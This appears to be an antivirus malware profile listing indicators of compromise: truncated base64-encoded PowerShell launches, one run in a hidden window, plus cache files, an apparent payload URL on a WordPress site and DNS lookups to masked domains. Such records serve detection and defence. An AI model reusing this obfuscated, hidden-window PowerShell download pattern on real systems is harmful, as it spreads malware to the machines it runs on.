Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAUABuAG0AZgBhAHcAcgBlAG0AYQBpACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAE0AbwBqAGwAegB6AG0AYwBiAGYAdAB0ACAAIwA+ACAAJABGAG4AcwBrAHMAbAB4AHcAcQBjAHoAPQAnA...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://te##.devel8.com/wp-content/X76MM/
- DNS ASK to####billiards.ca
- DNS ASK ho####earlane.com
- DNS ASK st####g.noc.com.sg
- DNS ASK te##.devel8.com
- DNS ASK de##l8.com
- DNS ASK ne#.######eticsliteracyproject.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAUABuAG0AZgBhAHcAcgBlAG0AYQBpACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAE0AbwBqAGwAegB6AG0AYwBiAGYAdAB0ACAAIwA+ACAAJABGAG4AcwBrAHMAbAB4AHcAcQBjAHoAPQAnA...' (with hidden window)